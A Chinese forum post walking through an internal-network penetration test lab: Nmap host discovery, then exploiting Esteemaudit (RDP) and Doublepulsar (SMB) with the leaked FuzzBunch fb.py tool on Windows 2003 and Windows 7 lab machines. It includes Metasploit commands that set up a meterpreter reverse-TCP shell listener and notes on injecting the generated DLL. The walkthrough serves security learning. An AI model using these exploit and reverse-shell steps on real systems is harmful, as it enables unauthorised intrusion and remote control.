-
-
[原创]内网渗透测试实验
-
发表于: 2017-7-22 22:59 2018
-
发现内网主机,测试验证Esteemaudit和Doublepulsar
在做内网渗透攻击时,首先要找到内网的主机,然后发现主机的漏洞,根据漏洞再进行攻击。在这篇文章里,主要介绍查找主机、主机漏洞以及验证的方法。
0.搭建环境
我们使用kali linux进行扫描,这个linux系统下载在https://www.kali.org/网站上,是目前世界上最流行的漏洞探测系统集成版本。kali是基于debian系统的,很多软件即使没有默认安装在系统上,你也可以通过系统下的apt-get进行安装。对于这个系统感兴趣的人可以下载并安装试试。当然下面介绍的扫描软件很多在windows上也能运行,你也可以不用安装kali而使用这些软件。
Esteemaudit(3389)渗透和验证系统为Win2003,具体配置方法如下:https://wenku.baidu.com/view/430e9e96964bcf84b9d57bd4.html。Doublepulsar(445)渗透和验证系统为攻击机 windows 7 x86 sp1,靶机 windows 7 x64 sp1。
1.内网扫描
Nmap是一款网络扫描和主机检测的非常有用的工具。 Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。KaLi Linux自带Nmap软件
在KaLi Linux上使用Nmap扫描内网192.168.4.0/24网段的主机:
15分钟才扫描了不到60%,而且,一台主机都没有发现,有问题,估计是防火强的存在导致扫描速度变慢了。
这时,你应该多查查nmap的命令,目前nmap是非常全的扫描方式,所以换一种方式,你可能会更快的扫描:
不到4分钟,你就可以看到4网段有哪些主机存在。
4网段UP的主机,目前活跃的主机
有些主机可以获取名字,这些主机一般都是windows域登陆账户
2.主机端口扫描
找到主机,找一台看看它开放了哪些端口,还是使用nmap工具
这个主机打开了ftp服务、ssh服务、139、445、514端口也都开启了。
3.寻找Esteemaudit(3389)漏洞。
通过msf创建dll,用于返回一个shell。
然后监听设置的端口,等待返回shell。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.4.2
set LPORT 4444
exploit
启动fb.py,配置基础参数
use Esteemaudit,这3个dll根据本地路径设置
X:\Xxxxxx\windows\storage 三个dll 都在该目录下
4.成功验证Esteemaudit
use Pcdlllauncher 注入dll
其中下面几个参数的路径需要重新设置
LPFilename D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll] 该参数自己根据情况设置,文件在x:\xxxxx\windows\Resources\Pc\Legacy 该目录下。
ImplantFilename 参数 设置为要注入的dll的路径,就是刚刚通过msf生成的dll,配置成功后,msf收到shell回连。
5.验证Doublepulsar(445)漏洞
运行fb.py
填写IP信息
填写LOG目录,创建工程
选择利用程序
选择os和模式
选择利用程序
选择协议和攻击架构
选择需要运行的功能
选择需要注入的DLL,注入的函数序号,注入的进程等信息
编写的一个简单测试DLL
靶机注入成功,执行calc.exe进程
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!